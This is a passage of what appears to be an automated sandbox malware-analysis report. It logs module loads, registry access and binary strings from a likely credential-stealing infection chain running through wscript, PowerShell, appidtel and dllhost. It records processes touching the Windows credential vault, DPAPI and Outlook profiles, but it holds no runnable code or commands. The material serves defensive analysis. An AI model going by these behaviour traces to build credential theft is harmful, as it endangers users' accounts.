              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 00000005.00000002.2743860674.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2649455449.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2651749861.0000000003067000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, dllhost.exe, 0000000B.00000003.2743752140.0000000003486000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2745671779.000000000363A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: appidtel.pdb source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3413640023.0000000003E0C000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808888776.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3042550015.000000000A11C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: appidtel.exe, 00000005.00000002.2743860674.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2649455449.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2651749861.0000000003067000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2743752140.0000000003486000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2745671779.000000000363A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QEwzeZKCXN.exe, 0000000A.00000002.3409362566.000000000013E000.00000002.00000001.01000000.00000006.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808153383.000000000013E000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: appidtel.pdbGCTL source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3413640023.0000000003E0C000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808888776.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3042550015.000000000A11C000.00000004.80000000.00040000.00000000.sdmp
